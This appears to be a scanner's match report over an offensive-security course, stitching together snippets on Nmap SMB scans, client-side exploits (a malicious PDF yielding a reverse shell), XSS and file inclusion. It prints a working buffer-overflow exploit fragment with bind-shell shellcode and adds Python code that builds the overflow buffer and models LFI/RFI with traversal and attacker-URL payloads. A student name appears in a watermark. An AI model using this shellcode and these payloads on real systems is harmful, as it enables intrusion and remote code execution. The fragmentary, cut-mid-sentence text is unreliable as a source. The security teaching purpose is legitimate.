Detected 2 occurrence(s) of ‘Nmap scan report for’:
ECLABS\WIN-HS8GZGTAPBH$ (RID: 1000) Nmap done: 1 IP address (1 host up) scanned in 6.72 seconds root@bt:~# nmap 192.168.11.221 --script smb-check-vulns.nse Starting Nmap 5.21 ( http://nmap.org ) at 2010-03-11 12:36 EST NSE: Script Scanning completed. Nmap scan report for 192.168.11.221 ... 135/tcp open msrpc 139/tcp open netbios-ssn OS-5777-PWB-Apurva-Rustagi 133 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 1025/tcp open NFS-or-IIS 1027/tcp
Detected 69 occurrence(s) of ‘shellcode’:
ce again, we discover that we can use two additional bytes of the file without ruining its structure (bytes 29,30). From this position, we can perform a short jump to our shellcode. After modifying our exploit, we create two “island hops” directly to our shellcode, and finally gain fully controlled code execution! 10.4 MS06-001 – an example from MSF Another horrendous vulnerability in Windows systems was Vulnerability in Graphics Rendering Engine (WMF). This vulnerability affecte
Detected 16 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:
er [-] Creating PDF file 'victim.pdf' DLL file 'output.dll' ... [-] Reading DLL data ... [-] Preparing payload (javascript+shellcode+dll) ... [-] Writing PDF file 'victim.pdf' with payload inside ... [+] Done, [Coromputer] is alive! alive! root@bt:~/CVE-2009-0927_package# Once the file is opened by a vulnerable victim – we should get a reverse shell! 10.3 MS07-017 – From PoC to Shell One of the nastiest client-side attacks ever to hit Microsoft is probably the Microsoft Windows
Detected 2 occurrence(s) of ‘remote file inclusion’:
ck is session-specific, meaning that it will work as long as the victim user stays logged on, or until their session expires. These are just a couple of simple examples of how powerful XSS attacks may be. 13.2 Local and Remote File Inclusion Local and remote file inclusion vulnerabilities are commonly found in poorly written PHP code. Whether they can be exploited also depends on the web server configuration, specifically php.ini settings such as register_globals and the allow_url_fopen / allow_url_include options that control URL wrappers.
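The dependence on php.ini described above, as an added example that is not part of the course material: a Python model of how an unvalidated include($_GET['page']) resolves an attacker-supplied value (traversal for LFI, a URL for RFI when allow_url_include is on), next to the allowlist form that closes both cases. The web root, the allowlist and the sample inputs are constructed for the demo.

```python
import posixpath
from urllib.parse import urlsplit

# Assumed document root and allowlist for the demo (constructed, not from the course).
WEB_ROOT = "/var/www/html"
ALLOWED_PAGES = {"home", "about", "contact"}
URL_SCHEMES = ("http", "https", "ftp")


def naive_include(page, allow_url_include=False):
    """Model of include($_GET['page']) with no validation.

    A URL is fetched and executed only when php.ini has allow_url_include=On
    (remote file inclusion); otherwise PHP refuses it. Any other value is
    treated as a path relative to the web root and '../' sequences are
    honoured, which is the local file inclusion case.
    Returns (kind, target) with kind in {"local", "remote", "refused"}.
    """
    if urlsplit(page).scheme in URL_SCHEMES:
        return ("remote", page) if allow_url_include else ("refused", page)
    return ("local", posixpath.normpath(posixpath.join(WEB_ROOT, page)))


def hardened_include(page):
    """Map the request parameter onto an allowlist of page names, so the
    raw value never reaches include() as a path or a URL at all."""
    if page not in ALLOWED_PAGES:
        return ("refused", page)
    return ("local", posixpath.join(WEB_ROOT, "pages", page + ".php"))


def escapes_root(result):
    """True when a resolved local include points outside the web root."""
    kind, target = result
    if kind != "local":
        return False
    return not (target == WEB_ROOT or target.startswith(WEB_ROOT + "/"))


if __name__ == "__main__":
    # Constructed sample inputs: a legitimate page, a traversal string, a remote URL.
    for value in ("home", "../../../../etc/passwd", "http://attacker.example/shell.txt"):
        print(value, "->", naive_include(value, allow_url_include=True),
              "| hardened:", hardened_include(value))
```

With allow_url_include off the naive version still includes /etc/passwd; turning the setting off only removes the remote case, which is why the fix is the allowlist and not the php.ini knob alone.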
Detected 52 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’:
\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80")
crash = "\x90"*200 + shellcode + "\x43" * 4090 + "\x42\x42\x42\x42" + "D"*7
buffer = "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
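The offset-finding step behind the 200 + shellcode + 4090 layout in the crash buffer above, as an added example that is not part of the course material: a Metasploit-style cyclic pattern is sent in place of the crash data, the dword that lands in EIP is looked up in the pattern, and the final buffer is assembled around that offset and checked. Written in Python 3 bytes; the framing prefix and suffix are taken from the buffer above, while the crashed EIP value, the placeholder shellcode and the return address are constructed for the demo.

```python
import string
import struct

# Fixed framing from the crash buffer above; target host, port and the real
# shellcode are deliberately not part of this example.
PREFIX = b"\x11(setup sound "
SUFFIX = b"\x90\x00#"


def cyclic_pattern(length):
    """Metasploit-style pattern (Aa0Aa1Aa2...): triplets of upper, lower,
    digit, so every 4-byte window is unique for the first 20280 bytes."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def dword_at(data, offset):
    """Little-endian dword at offset: what EIP holds after the saved return
    address at that position has been overwritten with these 4 bytes."""
    return struct.unpack("<I", data[offset:offset + 4])[0]


def pattern_offset(pattern, eip_value):
    """Offset in the pattern of the 4 bytes seen in EIP at the crash, or -1."""
    return pattern.find(struct.pack("<I", eip_value))


def build_buffer(shellcode, eip_offset, ret_addr, nop_sled=200, tail=7):
    """Assemble the same layout as the crash buffer above: NOP sled, shellcode,
    filler up to the EIP offset, the return address, a few trailing bytes."""
    filler = eip_offset - nop_sled - len(shellcode)
    if filler < 0:
        raise ValueError("sled + shellcode do not fit before the return address")
    crash = (b"\x90" * nop_sled + shellcode + b"\x43" * filler
             + struct.pack("<I", ret_addr) + b"D" * tail)
    return PREFIX + crash + SUFFIX


def eip_offset_in(buf, ret_addr):
    """Position of ret_addr relative to the start of the crash data, so the
    assembled buffer can be checked against pattern_offset()'s result."""
    pos = buf.find(struct.pack("<I", ret_addr))
    return -1 if pos < 0 else pos - len(PREFIX)


if __name__ == "__main__":
    pattern = cyclic_pattern(5000)
    # Constructed crash: pretend the debugger showed this value in EIP.
    eip = dword_at(pattern, 4360)
    off = pattern_offset(pattern, eip)
    print("EIP 0x%08x -> offset %d" % (eip, off))
    sc = b"\xcc" * 70                         # placeholder shellcode (70 x int3)
    buf = build_buffer(sc, off, 0x41414141)   # placeholder return address
    print("return address lands at crash offset", eip_offset_in(buf, 0x41414141))
```

With a 70-byte shellcode and a 200-byte sled, an EIP offset of 4360 gives exactly the 4090 bytes of filler used above; changing the shellcode length shifts the filler rather than the return address, which is the invariant the layout has to keep.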